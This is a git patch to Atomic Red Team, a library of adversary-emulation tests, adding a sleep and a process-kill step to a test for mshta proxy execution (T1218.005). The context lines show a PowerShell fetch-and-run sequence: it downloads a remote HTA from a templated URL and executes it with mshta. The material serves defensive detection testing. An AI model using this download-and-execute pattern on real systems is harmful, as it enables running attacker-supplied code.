From cc0f4485ca65ce819400b5ddad14ef5c68510f8d Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Wed, 12 Oct 2022 19:10:02 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/index.yaml     | 2 ++
 atomics/T1218.005/T1218.005.md | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 332e2f06..3fad9a69 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -14998,6 +14998,8 @@ defense-evasion:
           $var =Invoke-WebRequest "#{hta_url}"
           $var.content|out-file "#{temp_file}"
           mshta "#{temp_file}"
+          start-sleep -s 15
+          stop-process -name "calculator" -Force
         cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
 
           '
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 0810fcc5..423de368 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -124,6 +124,8 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
 $var =Invoke-WebRequest "#{hta_url}"
 $var.content|out-file "#{temp_file}"
 mshta "#{temp_file}"
+start-sleep -s 15
+stop-process -name "calculator" -Force
 ```
 
 #### Cleanup Commands: